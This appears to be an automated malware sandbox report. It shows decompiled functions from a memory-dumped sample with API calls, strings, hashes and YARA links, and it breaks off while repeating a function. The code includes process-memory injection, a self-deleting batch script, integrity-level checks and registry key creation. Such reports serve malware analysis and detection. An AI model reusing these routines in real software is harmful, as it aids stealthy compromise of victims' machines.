Instruction ID: 40d891acf0eda6f0c55417b00496234f40c715e507e30207fa65c75dee0536b0
Opcode Fuzzy Hash: 380f36af9b4bfb47285306e4499a1026238ca51f7e9324b1cbe9584085735a7d
Instruction Fuzzy Hash: 1C316072900259AADF109FB9CD84EDE7B69AF19370F108316F935A61D0C6B4D9C08B69

Uniqueness

Uniqueness Score: -1.00%

Function 004131B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004131B6(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t26 = E00410B1B( *0x4238b4, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x4238a0 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x4238a0 -  *0x4238b4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x4238b4 -  *0x4238b4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041298C(0x423d64, _t51, _v12,  *0x423d64) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041298C(0x423d68, _t51, _v12,  *0x423d68) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x004131b6
0x004131b6
0x004131c2
0x004131c9
0x004131ce
0x004131e3
0x004131f0
0x004131f2
0x004131f2
0x004131fe
0x00413201
0x00413223
0x00413225
0x00413225
0x00413244
0x00413246
0x00413246
0x0041325f
0x00413261
0x00413261
0x0041327a
0x0041327c
0x0041327c
0x00413282
0x00413299
0x00413284
0x0041328e
0x00000000
0x0041328e
0x004131d0
0x004131d0
0x004131d0
0x004131d0
0x0041329e

APIs

Part of subcall function 00410B1B: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 00410B37

DuplicateHandle.KERNEL32(000000FF,0001FEE6,00000000,0001FEE6,00000000,00000000,00000002,00000000,00000000,?,?,?,0041D70F,?,00000000,?), ref: 004131E8
WriteProcessMemory.KERNEL32(00000000,0001FEE6,?,00000004,00000000,?,?,?,?,0041D70F,?,00000000,?,?,0041D8A7,?), ref: 0041321F
WriteProcessMemory.KERNEL32(00000000,0001FEE6,0001FEE6,00000004,00000000,?,?,?,0041D70F,?,00000000,?,?,0041D8A7,?,?), ref: 0041323F
VirtualFreeEx.KERNEL32(00000000,0001FEE6,00000000,00008000,00000000,0001FEE6,00000000,0001FEE6,?,?,0041D70F,?,00000000,?,?,0041D8A7), ref: 0041328E

Strings

h=B, xrefs: 0041326A
d=B, xrefs: 0041324F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: d=B$h=B
API String ID: 2215616122-3823919649
Opcode ID: bc32e26d24aa22d70f2c77264d37951103fc2bddabc51842d4e071a7b4bd53e9
Instruction ID: 20d3752369f00b665c8adad5772c1c905fca975fa0b81cd73bb5f3365143e57c
Opcode Fuzzy Hash: bc32e26d24aa22d70f2c77264d37951103fc2bddabc51842d4e071a7b4bd53e9
Instruction Fuzzy Hash: 8121E671704249BADF11AFA8DD81FEEBFB8EB19349F444095F600E7111D3799B468B28

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC82, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040DC82(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0041153E(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E0040CF86( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0041151D( &_v592);
					goto L7;
				}
				_t35 = E00411372( &_v592, _a4, _t31);
				E0040C1C2(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E0040CEB5( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E0040C275( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E0040DA89( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x0040dc9e
0x0040dd90
0x00000000
0x0040dd90
0x0040dcb2
0x0040dcbe
0x0040dcd6
0x0040dd84
0x0040dd8b
0x00000000
0x0040dd8b
0x0040dce8
0x0040dcf2
0x0040dcfa
0x00000000
0x00000000
0x0040dd00
0x0040dd07
0x0040dd23
0x00000000
0x0040dd44
0x0040dd46
0x0040dd4e
0x0040dd56
0x0040dd6e
0x0040dd71
0x00000000
0x0040dd7f

APIs

Part of subcall function 0041153E: GetTempPathW.KERNEL32(000000F6,?), ref: 00411555

CharToOemW.USER32 ref: 0040DCB2

Part of subcall function 00411372: CreateFileW.KERNEL32(0040DC9C,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 0041138C
Part of subcall function 00411372: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113AF
Part of subcall function 00411372: CloseHandle.KERNEL32(00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113BC

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 0040DD36

Strings

ComSpec, xrefs: 0040DD31
@echo off%sdel /F "%s", xrefs: 0040DCC5
bat, xrefs: 0040DC92
/c "%s", xrefs: 0040DD08

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 1b0b96e96e54bdb7cb7c206b3389acfec892e2d96021c0099daf533f19ebf529
Instruction ID: 4453817e2855f3db5f3f3c386b6341654c80ee38f9c4eefc85701f18fa5c9e9c
Opcode Fuzzy Hash: 1b0b96e96e54bdb7cb7c206b3389acfec892e2d96021c0099daf533f19ebf529
Instruction Fuzzy Hash: 54218272901109AADB10EBA4CC85FEF77ADDF04314F104277B908F20D1D6789A898F68

Uniqueness

Uniqueness Score: -1.00%

Function 00404E69, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E69(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E004128DB(_t18,  &_v32);
				if(E00411A47(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E004128A5(_t26,  &_v360);
				_t9 =  &_v8; // 0x404e51
				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0041151D( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E0040CCFF(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x00404e76
0x00404e79
0x00404e7a
0x00404e7d
0x00404e7f
0x00404e95
0x00404f4b
0x00404f4f
0x00404f4f
0x00404eb4
0x00404eba
0x00404ec0
0x00000000
0x00000000
0x00404ecf
0x00404ed0
0x00404ed2
0x00404eef
0x00404ef6
0x00404f27
0x00404f2a
0x00404f33
0x00404f3c
0x00404f45
0x00404f45
0x00000000
0x00404efd
0x00404efd
0x00404f02
0x00404f21
0x00404f21
0x00000000
0x00404f21
0x00404f0b
0x00404f1a
0x00404f25
0x00000000
0x00000000
0x00000000
0x00000000
0x00404f1a

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00404EB4
WriteFile.KERNEL32(QN@,?,00000146,?,00000000,00000000), ref: 00404EF2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404F16
FlushFileBuffers.KERNEL32(?), ref: 00404F2A
CloseHandle.KERNEL32(?), ref: 00404F33

Strings

QN@, xrefs: 00404EEF

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID: QN@
API String ID: 2459967240-2316942990
Opcode ID: d7cae2b8589381db74dc6e687a73c927c6812c9386db1542821bdad1d22ae52b
Instruction ID: a7a08f163eaec10adf082d04207e802cc9d62303a2fb228ec2632a2d19179faf
Opcode Fuzzy Hash: d7cae2b8589381db74dc6e687a73c927c6812c9386db1542821bdad1d22ae52b
Instruction Fuzzy Hash: F221DE71D41119BADF20EBA1CD05FDF7BBCAF84310F0041A6A600F31A0DB399A41CA64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D916, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040D916(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E0040C192(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E0040C1C2(_t32);
					goto L12;
				}
			}

0x0040d924
0x0040d92e
0x0040d9c4
0x0040d9c8
0x0040d9c8
0x0040d94a
0x0040d9ba
0x0040d9bd
0x00000000
0x0040d957
0x0040d960
0x0040d964
0x0040d9b9
0x00000000
0x0040d9b9
0x0040d977
0x0040d97b
0x0040d983
0x0040d985
0x0040d989
0x0040d992
0x0040d99a
0x0040d9a3
0x0040d9ae
0x0040d9b0
0x0040d9a5
0x0040d9a5
0x0040d9a5
0x0040d9a3
0x0040d99a
0x0040d989
0x0040d983
0x0040d9b4
0x00000000
0x0040d9b4

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D926
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,0001FEBC,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D946
GetLastError.KERNEL32(?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D94C
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D973
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D97B
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D992
CloseHandle.KERNEL32(?,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040D9BD

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: d3ef0378942a04670fe06f51cde1e823b8d1c45a2ad1b75cb6d16dae2893d515
Instruction ID: c3d8cdcc048b92f71fa599b908cc6ac6bae12259ac95733aa2591340d51e01ae
Opcode Fuzzy Hash: d3ef0378942a04670fe06f51cde1e823b8d1c45a2ad1b75cb6d16dae2893d515
Instruction Fuzzy Hash: A4118175A00018BFEB115BD4DE84EAE3B6EEF45314F100176F540F62E0D7799E89AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004106DC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004106DC(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E00410541(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x00410701
0x00410704
0x00410706
0x00410708
0x00410711
0x00410714
0x0041071d
0x0041073a
0x00000000
0x0041073c
0x0041073f
0x00410745
0x00410752
0x00000000
0x00000000
0x00000000
0x00410745
0x00410756
0x00410759
0x00000000
0x00410747
0x00410747
0x0041074a
0x00000000
0x00410750
0x0041075c
0x00410762

APIs

RegCreateKeyExW.ADVAPI32(?,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00410704

Part of subcall function 00410541: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00410662

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00410736
RegCloseKey.ADVAPI32(?), ref: 0041073F
RegCloseKey.ADVAPI32(?), ref: 00410759

Strings

SOFTWARE\Microsoft, xrefs: 004106F7
d, xrefs: 0041074A

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 2f3bbecf64628a8107dacd1b239af6d8eed1ad0a70a06ea6be7b650f4e4518dd
Instruction ID: 0d9f4bfd91e3f8eae80743e233cccfe7f4a86c1f08a648fe995b5b573335f553
Opcode Fuzzy Hash: 2f3bbecf64628a8107dacd1b239af6d8eed1ad0a70a06ea6be7b650f4e4518dd
Instruction Fuzzy Hash: 2C1161B590020CBEEB019B94DD81EFFBBBCEB05388F104066F511B21A1D2B59E858B74

Uniqueness

Uniqueness Score: -1.00%

Function 0040F843, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040F843(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E0040D88E(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0040f84f
0x0040f851
0x0040f857
0x0040f862
0x0040f86a
0x0040f87b
0x0040f87e
0x0040f886
0x0040f895
0x0040f89d
0x0040f89f
0x0040f89f
0x0040f89d
0x0040f8a4
0x0040f8a4
0x0040f8ae

APIs

Part of subcall function 0040D88E: GetCurrentThread.KERNEL32 ref: 0040D89E
Part of subcall function 0040D88E: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
Part of subcall function 0040D88E: OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040F862
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0040F87E
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040F895
LocalFree.KERNEL32(00000000), ref: 0040F8A4

Strings

SeSecurityPrivilege, xrefs: 0040F84A
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0040F85D

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 78359a01a79895dba4bb20c5a8f07e53e7606c108d77db61401bdaafbfe76a0d
Instruction ID: f1782867dcea977c6d72f02bc48075ec8c9855c20e992ddcee7adb817be3e79d
Opcode Fuzzy Hash: 78359a01a79895dba4bb20c5a8f07e53e7606c108d77db61401bdaafbfe76a0d
Instruction Fuzzy Hash: AD016D7664020CBFEB11AFA08D85EEE7B7DEB04744F004476BA01B11A1D77A9A449A28

Uniqueness

Uniqueness Score: -1.00%

Function 00407FF8, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00407FF8(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E00407F19(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E00416AB6(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E00407F19(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x00407ff8
0x00407ffb
0x00407fff
0x00408002
0x0040800a
0x00408027
0x0040802f
0x00000000
0x00000000
0x00408031
0x0040804c
0x00408054
0x0040806a
0x00000000
0x00000000
0x00000000
0x00000000
0x00408070
0x00408070
0x00408070
0x00408086
0x0040808e
0x00408095
0x004080c0
0x004080c5
0x004080c8
0x004080cb
0x004081e2
0x004081e5
0x0040822a
0x0040822f
0x0040825a
0x0040825f
0x00408179
0x0040817d
0x0040817d
0x00408265
0x00408267
0x00408267
0x0040826a
0x00000000
0x00000000
0x00408270
0x00408273
0x00408168
0x00408168
0x0040816e
0x0040816f
0x00408174
0x00408177
0x00000000
0x00408177
0x00408279
0x00408279
0x0040827c
0x0040827f
0x00000000
0x0040827f
0x00408234
0x00408237
0x0040823c
0x00000000
0x00000000
0x00408249
0x00408255
0x00000000
0x00408255
0x004081e7
0x00408136
0x00408136
0x00408139
0x004080b4
0x004080b4
0x00000000
0x004080b4
0x004081ed
0x004081f0
0x004081a4
0x004081a4
0x004081a9
0x004081bd
0x004081bd
0x00000000
0x004081a9
0x004081f2
0x004081f5
0x00408215
0x0040821a
0x0040810e
0x0040810e
0x00408113
0x00408113
0x00000000
0x00000000
0x00000000
0x00408115
0x00408163
0x00408163
0x00000000
0x00408163
0x004081f7
0x004081fa
0x00000000
0x00000000
0x00408200
0x00408205
0x00000000
0x00000000
0x0040820b
0x00000000
0x0040820b
0x004080d1
0x004081c4
0x004081c9
0x00000000
0x00000000
0x004081cf
0x004081d2
0x004081d9
0x00000000
0x00000000
0x004081db
0x00000000
0x004081db
0x004080d7
0x004080da
0x00408192
0x00408197
0x00000000
0x00000000
0x00408199
0x0040819e
0x00000000
0x00000000
0x00000000
0x0040819e
0x004080e0
0x004080e3
0x0040815c
0x00408161
0x00408180
0x00408185
0x00000000
0x00000000
0x0040818b
0x00000000
0x0040818b
0x00000000
0x00408161
0x004080e5
0x004080e8
0x0040813f
0x00408144
0x0040814f
0x00408154
0x00000000
0x00000000
0x00408156
0x00408158
0x0040814a
0x0040814a
0x00000000
0x0040814a
0x00408146
0x00408148
0x00000000
0x00408148
0x004080ed
0x004080f0
0x00000000
0x00000000
0x004080f2
0x004080f7
0x0040812b
0x00408130
0x00408133
0x00000000
0x00408133
0x004080f9
0x004080fe
0x00000000
0x00000000
0x00408100
0x00408105
0x00000000
0x00000000
0x00408107
0x0040810c
0x00000000
0x00000000
0x00000000
0x0040810c
0x0040809d
0x004080a2
0x004080a8
0x004080af
0x00000000
0x004080af

APIs

GetAncestor.USER32(?,00000002), ref: 00408021
SendMessageTimeoutW.USER32 ref: 0040804C
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040808E
GetWindowThreadProcessId.USER32(?,00000000), ref: 00408124
PostMessageW.USER32(?,00000112,?,?), ref: 00408177
GetWindowThreadProcessId.USER32(?,00000000), ref: 004081B6

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
Instruction ID: 00ebfd8a87f7ed5b7d6f2997a2a79c770807de206319f7e02cd51a52678822f0
Opcode Fuzzy Hash: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
Instruction Fuzzy Hash: E4518130600305AAEF304E19CE85BBE3664EF15350F24053FF9C1BA2E1CA7DDD92A65A

Uniqueness

Uniqueness Score: -1.00%

Function 00407FF8, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00407FF8(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
